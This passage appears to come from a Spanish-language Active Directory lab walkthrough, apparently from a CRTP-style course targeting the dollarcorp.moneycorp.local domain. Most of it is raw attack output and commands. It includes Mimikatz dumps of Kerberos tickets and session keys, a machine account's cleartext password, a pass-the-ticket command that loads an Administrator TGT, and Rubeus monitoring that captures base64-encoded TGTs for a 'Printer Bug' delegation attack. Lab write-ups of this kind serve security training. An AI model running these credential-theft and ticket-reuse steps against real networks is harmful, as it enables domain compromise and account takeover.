           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;5894d2]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !

Authentication Id : 0 ; 5673303 (00000000:00569157)
Session           : Network from 0
User Name         : Administrator
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 3/2/2024 3:27:12 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-500

         * Username : Administrator
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:27:12 PM ; 3/3/2024 1:27:12 AM ; 3/9/2024 3:27:12 PM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : Administrator ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             0cdf7b93381a1d8d1989b0a1def31d6c1fea0528053cb784e8ce4198a67c03d4
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;569157]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !

Authentication Id : 0 ; 5665378 (00000000:00567262)
Session           : Network from 0
User Name         : Administrator
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 3/2/2024 3:26:12 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-500

         * Username : Administrator
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:26:12 PM ; 3/3/2024 1:26:12 AM ; 3/9/2024 3:26:12 PM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : Administrator ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             49829367d874b0821ad9d838590172a7674927d5ad930637ec125a94155ed7ab
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;567262]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !

Authentication Id : 0 ; 5653909 (00000000:00564595)
Session           : Network from 0
User Name         : appadmin
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 3/2/2024 3:25:54 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1117

         * Username : appadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:19:27 PM ; 3/3/2024 1:19:26 AM ; 3/9/2024 3:19:26 PM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             48fd7b2d67275c81b3d55a0668863839889faca9c4236baa54aa62a157031517
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;564595][email protected] !

Authentication Id : 0 ; 5651775 (00000000:00563d3f)
Session           : Network from 0
User Name         : Administrator
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 3/2/2024 3:25:12 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-500

         * Username : Administrator
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 3:25:12 PM ; 3/3/2024 1:25:12 AM ; 3/9/2024 3:25:12 PM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : Administrator ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             09fd65bfe802af8a9a8c7efd8b07e984e42c7a663f3137c48ccba619913fd697
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;563d3f]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !

Authentication Id : 0 ; 744308 (00000000:000b5b74)
Session           : RemoteInteractive from 2
User Name         : appadmin
Domain            : dcorp
Logon Server      : DCORP-DC
Logon Time        : 2/19/2024 11:45:42 PM
SID               : S-1-5-21-719815819-3726368948-3917688648-1117

         * Username : appadmin
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 3/2/2024 6:47:37 AM ; 3/2/2024 4:47:37 PM ; 3/9/2024 6:47:37 AM
           Service Name (02) : ldap ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (02) : ldap ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             83eac06aad96aeeb98fa05fbec1c6ae46c43f4242acc8c7a95214d6d5198f9c5
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 13       [...]
           * Saved to file [0;b5b74]-0-0-40a50000-appadmin@ldap-dcorp-dc.dollarcorp.moneycorp.local.kirbi !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 6:47:37 AM ; 3/2/2024 4:47:37 PM ; 3/9/2024 6:47:37 AM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             8a51aeac4d6f41dbf3b4a0521971ef8083deea1faecef88f7e91b2cdf05bedc2
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;b5b74][email protected] !

Authentication Id : 0 ; 509404 (00000000:0007c5dc)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2/19/2024 11:41:46 PM
SID               : S-1-5-96-0-2

         * Username : DCORP-APPSRV$
         * Domain   : dollarcorp.moneycorp.local
         * Password : Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19un%6QdFsVpR@Pc[xv$W&=< V

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2/19/2024 11:31:00 PM
SID               : S-1-5-19

         * Username : (null)
         * Domain   : (null)
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DCORP-APPSRV$
Domain            : dcorp
Logon Server      : (null)
Logon Time        : 2/19/2024 11:30:59 PM
SID               : S-1-5-18

         * Username : dcorp-appsrv$
         * Domain   : DOLLARCORP.MONEYCORP.LOCAL
         * Password : (null)

        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 3/2/2024 6:08:13 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
           Service Name (02) : cifs ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (02) : cifs ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( dollarcorp.moneycorp.local )
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             48d75d73c69a2cf65cff3f8656fa1d26535f1f52e36d92bd90afa851521a9137
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 13       [...]
           * Saved to file [0;3e7]-0-0-40a50000-DCORP-APPSRV$@cifs-dcorp-dc.dollarcorp.moneycorp.local.kirbi !
         [00000001]
           Start/End/MaxRenew: 3/2/2024 6:08:13 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
           Service Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             a4a58fc9c51ba8ab93b54094e159d3d04c72a7b3df015c39c6acae0efd7bcab0
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 1        [...]
           * Saved to file [0;3e7]-0-1-40a50000.kirbi !
         [00000002]
           Start/End/MaxRenew: 3/2/2024 5:35:48 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
           Service Name (02) : LDAP ; dcorp-dc.dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (02) : LDAP ; dcorp-dc.dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             345feb7e4ce63f3f8570d7d6c2eb0b5727b632fa3c6a24892a8907ce59033e5a
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 13       [...]
           * Saved to file [0;3e7]-0-2-40a50000-DCORP-APPSRV$@LDAP-dcorp-dc.dollarcorp.moneycorp.local.kirbi !
         [00000003]
           Start/End/MaxRenew: 3/2/2024 5:35:48 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
           Service Name (02) : LDAP ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (02) : LDAP ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             9b66315d4af0b7876e8e5eef7cea6e18c0ac5a1b80efb4d47a80f23d1391aa87
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 13       [...]
           * Saved to file [0;3e7]-0-3-40a50000-DCORP-APPSRV$@LDAP-dcorp-dc.dollarcorp.moneycorp.local.kirbi !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 3/2/2024 6:08:13 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (--) : @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( $$Delegation Ticket$$ )
           Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             8e84e6efee04a8e9b8ee4f32ad4ef671288f461d736713aa46d7835469e933a5
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;3e7]-2-0-60a10000-DCORP-APPSRV$@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
         [00000001]
           Start/End/MaxRenew: 3/2/2024 3:20:48 PM ; 3/3/2024 1:20:48 AM ; 3/9/2024 5:35:48 AM
           Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Target Name  (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
           Client Name  (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000001 - des_cbc_crc
             08674be3b711292ce24410664db5e24e10343c51bb9c2914680d01ae16b77388
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;3e7]-2-1-40e10000-DCORP-APPSRV$@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !

Luego podemos verificar los tickets actuales que tenemos cargados.

PS C:\> klist
klist

Current LogonId is 0:0x563ebd

Cached Tickets: (1)

#0>     Client: appadmin @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 3/2/2024 15:19:27 (local)
        End Time:   3/3/2024 1:19:26 (local)
        Renew Time: 3/9/2024 15:19:26 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
PS C:\>

Luego cargamos uno de los tickets de admin.

PS C:\> Invoke-Mimikatz -Command '"kerberos::ptt [0;563d3f]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt [0;563d3f]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::ptt [0;563d3f]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi

* File: '[0;563d3f]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi': OK

Luego revisamos nuestros tickets

PS C:\> klist
klist

Current LogonId is 0:0x563ebd

Cached Tickets: (1)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 3/2/2024 15:25:12 (local)
        End Time:   3/3/2024 1:25:12 (local)
        Renew Time: 3/9/2024 15:25:12 (local)
        Session Key Type: Kerberos DES-CBC-CRC
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Printer Bug

Iniciamos el modo de escucha en la maquina dcorp-appsrv.

PS C:\> .\Rubeus.exe monitor /interval:5 /nowrap
.\Rubeus.exe monitor /interval:5 /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:19:27 PM
  EndTime               :  3/3/2024 1:19:26 AM
  RenewTill             :  3/9/2024 3:19:26 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:54:12 PM
  EndTime               :  3/3/2024 1:54:12 AM
  RenewTill             :  3/9/2024 3:54:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:52:12 PM
  EndTime               :  3/3/2024 1:52:12 AM
  RenewTill             :  3/9/2024 3:52:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIGZjCCBmKgAwIBBaEDAgEWooIFNjCCBTJhggUuMIIFKqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBNIwggTOoAMCARKhAwIBAqKCBMAEggS8TUFhv9+VTyNeIzRbnP0hEgIb3fF+zlVgY/QpYKHwUN2xUq4jXwr9xg+BWbGZhN5ekduHVamv5VXtZk/GrVXR54vE9oyL3Xw7wUa6mX2jm+S0Xy5bS9kV5xjiwH7iTJKYP2hZWr7G21qy5xYYH87QQYm8s1GsgC2nUQ+lrBYLGdtLm1hnZK8JWewn5jyyI9WfLtp+45Yw/lrdxxO73LXaqIfFGIeDhFV1aGIpJRllr9Yy6XzydT/Z20l8Sno9vxPrwcVHYfWiSGjvuQqEsymxqinMrrZfjOFVdf7x64eS+cU31yrPiYBYstBEQLWafLrskn+LfP+Lstbj20b0KpOW45cfYJkEwk6yE1uv3kZpERq1H4Y5CxngwyCFeoI9q+SBIdjjD8UlvakpCbCWX3f7kGHUyFu01oLfrVD0phHjh5qqPBj7uBIBpPimf0uwVZ/1eUFFTTUDR3ySNcw5t3/4Z0HAzHfgNiyRnklbEJWcA5xBXcrNQLrZgskae4rRzeN9bUrLLMWDCdbRC7O+skaT6rrSVJp+nMLDP2SV7syUXpj+yF+awoFMaai3f/vWfGjfQ8xc2Zr9v6xNMJhFVfVh31YpO6b1UdL8q0aCI3VPiGQ0r610UShJTtvqqL4mdXrwkxSMyHFkmwC+lcJGRinrA7Sxl/d1dS2diWt2YciTCS9bVOiLhZ22VTZe4vJHkI8h5a5by9F1hGHp5fjBOIfR8Gw0XaD8tBcVzS8FMyPKDBF7GOuN2UmZZudOGQY0qJgzzGSBV78YGxYKYRXdidi+Q7QIkiy7UnR01uHxpL1CLlkSxjcyZFzH2cWjZfFtvwQWIckZVlW18zyLB4RKFMo+uRPYF+MMSIJU/7m4GZQUaqHZrVfUhjXEXa4i4Tdz0X5ZHCouYX5jJbu2VZncYjyxYt/Rbvy6bt/GTfvRzU9sIBnDl8FaCzuDLC/xmAQMGkLGE+V6xCWasBq+ZV3Q8Xgv1gUvYxeSaAHq2f4fC2G38fuaywc/z5GTO7vietzFSC3qPJkkXYx09MFIPxd6np052lyvS94eRoAQwMKo9aGXNMD6Lc7uoybcge3hPU/R8qQpl3guudklg0E9zfIuUrE3IwWihsLKQowAZZg4dvyIVG43zagd32dam5zjXRb24PBzTbc9xp2CGUTcyw6TkfBWHZ+sWHJQEXMKhlAvyCxjiAep2DLkP8UweVpf8Gxe4JXu4uiUZVV1Zhepi4waQDmSkN+93XC+3PqfSc8VL8++K76t5tIWYqNMT4U48n1bf5obxbzuz3VJIkkI9rUaqjIU6DzhnG9PCsHYsHoUZegbajEhbmlYxMq7CxQGIXZd7A1pMNRdRfiHUPPRSOnLd